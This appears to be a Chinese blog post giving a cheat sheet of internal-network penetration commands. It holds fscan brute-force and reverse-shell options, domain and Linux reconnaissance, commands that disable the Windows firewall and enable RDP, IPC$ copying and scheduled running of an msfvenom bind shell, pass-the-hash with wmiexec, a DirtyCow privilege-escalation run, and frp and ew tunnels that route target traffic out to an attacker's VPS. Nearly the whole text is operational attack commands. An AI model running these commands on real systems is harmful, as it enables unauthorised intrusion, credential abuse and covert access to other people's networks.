内网渗透常用命令

本文主要用来记录经常使用的命令,后续会不断补充

nmap主机探测

proxychains nmap -sV -Pn -p 22,80,135,443,445,3389 192.168.52.141

fscan主机探测

./fscan -h 192.168.52.128/24 -hn 192.168.52.128 -socks5 socks5://127.0.0.1:10010
-c string
      ssh命令执行
-cookie string
      设置cookie
-debug int
      多久没响应,就打印当前进度(default 60)
-domain string
      smb爆破模块时,设置域名
-h string
      目标ip: 192.168.11.11 | 192.168.11.11-255 | 192.168.11.11,192.168.11.12
-hf string
      读取文件中的目标
-hn string
      扫描时,要跳过的ip: -hn 192.168.1.1/24
-m string
      设置扫描模式: -m ssh (default "all")
-no
      扫描结果不保存到文件中
-nobr
      跳过sql、ftp、ssh等的密码爆破
-nopoc
      跳过web poc扫描
-np
      跳过存活探测
-num int
      web poc 发包速率 (default 20)
-o string
      扫描结果保存到哪 (default "result.txt")
-p string
      设置扫描的端口: 22 | 1-65535 | 22,80,3306 (default "21,22,80,81,135,139,443,445,1433,3306,5432,6379,7001,8000,8080,8089,9000,9200,11211,27017")
-pa string
      新增需要扫描的端口,-pa 3389 (会在原有端口列表基础上,新增该端口)
-path string
      fcgi、smb romote file path
-ping
      使用ping代替icmp进行存活探测
-pn string
      扫描时要跳过的端口,as: -pn 445
-pocname string
      指定web poc的模糊名字, -pocname weblogic
-proxy string
      设置代理, -proxy http://127.0.0.1:8080
-user string
      指定爆破时的用户名
-userf string
      指定爆破时的用户名文件
-pwd string
      指定爆破时的密码
-pwdf string
      指定爆破时的密码文件
-rf string
      指定redis写公钥用模块的文件 (as: -rf id_rsa.pub)
-rs string
      redis计划任务反弹shell的ip端口 (as: -rs 192.168.1.1:6666)
-silent
      静默扫描,适合cs扫描时不回显
-sshkey string
      ssh连接时,指定ssh私钥
-t int
      扫描线程 (default 600)
-time int
      端口扫描超时时间 (default 3)
-u string
      指定Url扫描
-uf string
      指定Url文件扫描
-wt int
      web访问超时时间 (default 5)
-pocpath string
      指定poc路径
-usera string
      在原有用户字典基础上,新增新用户
-pwda string
      在原有密码字典基础上,增加新密码
-socks5
      指定socks5代理 (as: -socks5 socks5://127.0.0.1:1080)
-sc
      指定ms17010利用模块shellcode,内置添加用户等功能 (as: -sc add)

msf主机探测模块

windows/gather/arp_scanner
auxiliary/scanner/discovery/udp_probe

探测域情况

net time /domain                             #查看时间服务器
net user /domain                             #查看域用户
net view /domain                             #查看有几个域
net view /domain:GOD                         #查看GOD域情况
nslookup 主机名                   #查看域内其他主机 可能ip查不出来
net group "domain computers" /domain         #查看域内所有的主机名
net group "domain admins"   /domain         #查看域管理员
net group "domain controllers" /domain       #查看域控

linux信息搜集

uname -a    # 获取所有版本信息
uname -m    # 获取Linux内核架构
cat /proc/version    # 获取内核信息 
cat /etc/*-release   # 发布信息
cat /etc/issue    # 发布信息
hostname    # 获取主机名
cat /etc/passwd    # 列出系统所有用户 
cat /etc/group    # 列出系统所有组 
w    # 查看目前登录的用户
whoami    # 查看当前用户 
id    # 查看当前用户信息 
sudo -l    # 列出目前用户可执行与无法执行的指令 
ps aux    # 查看进程信息 
ls -la /etc/cron*    # 查看计划任务
ifconfig -a    # 列出网络接口信息 
cat /etc/network/interfaces    # 列出网络接口信息 
arp -a    # 查看系统arp表 
route    # 打印路由信息
netstat -anplt    # 打印本地端口开放信息 
iptables -L    # 列出iptable的配置规则

常用命令

开启3389端口,防火墙放行

reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
netsh advfirewall firewall set rule group="remote desktop" new enable=Yes

结束进程

taskkill /F /IM xxx.exe

开启IPC管道

net use \\192.168.52.20\ipc$ "域密码" /user:"administrator"
copy Win08.exe \\192.168.200.20\c$ 
at \\192.168.52.141 16:18:00 c:\shell_bind.exe

msf生成正向shell

msfvenom -p windows/shell/bind_tcp LPORT=4444 -f exe -o shell_bind.exe

msf引入路由

run post/multi/manage/autoroute

windows关闭防火墙

netsh advfirewall set allprofiles state off

pth

python3 wmiexec.py username@x.x.x.x -hashes LMHASH:NTHASH
python3 wmiexec.py username:password@x.x.x.x

scp

scp localfile.txt 用户名@remote_host:~

dirtycow

gcc -pthread dirty.c -o dirty -lcrypt
./dirty
su firefart

kali下rdp连接

proxychains4 xfreerdp /v:192.168.93.10 /u:用户名 /p:密码

proxychains4 rdesktop x.x.x.x

隧道搭建

frp隧道搭建

frpc运行在目标机器上

cat frpc.toml

serverAddr = "11.11.11.3"       #这里写vps的IP
serverPort = 7000

[[proxies]]
name = "socks5"
type = "tcp"
remotePort = 6028     #这个端口便是vps的代理转发端口,proxychains写此端口
[proxies.plugin]
type = "socks5"

./frpc -c ./frpc.toml &

frps运行在vps上

cat frps.toml

bindPort = 7000

./frps -c ./frps.toml &

ew隧道搭建

ew正向代理

./ew -ssocksd -l 8888

ew反向代理

#将本机的4567端口的流量转发到1234端口
./ew_for_linux64 -s rcsocks -l 1234 -e 4567                       // kali 操作

#将本机的流量转发到kali的4567端口
./ew_for_linux64 -s rssocks -d [kali IP] -e 4567 &           // 目标机 操作

这样就实现了隧道搭建,我们可以直接访问kali本地的1234端口,就能代理到内网,kali本地代理是127.0.0.1:1234,proxychains4也写127.0.0.1:1234
暂无评论

发送评论 编辑评论


				
|´・ω・)ノ
ヾ(≧∇≦*)ゝ
(☆ω☆)
(╯‵□′)╯︵┴─┴
 ̄﹃ ̄
(/ω\)
∠( ᐛ 」∠)_
(๑•̀ㅁ•́ฅ)
→_→
୧(๑•̀⌄•́๑)૭
٩(ˊᗜˋ*)و
(ノ°ο°)ノ
(´இ皿இ`)
⌇●﹏●⌇
(ฅ´ω`ฅ)
(╯°A°)╯︵○○○
φ( ̄∇ ̄o)
ヾ(´・ ・`。)ノ"
( ง ᵒ̌皿ᵒ̌)ง⁼³₌₃
(ó﹏ò。)
Σ(っ °Д °;)っ
( ,,´・ω・)ノ"(´っω・`。)
╮(╯▽╰)╭
o(*////▽////*)q
>﹏<
( ๑´•ω•) "(ㆆᴗㆆ)
😂
😀
😅
😊
🙂
🙃
😌
😍
😘
😜
😝
😏
😒
🙄
😳
😡
😔
😫
😱
😭
💩
👻
🙌
🖕
👍
👫
👬
👭
🌚
🌝
🙈
💊
😶
🙏
🍦
🍉
😣
Source: github.com/k4yt3x/flowerhd
颜文字
Emoji
小恐龙
花!
上一篇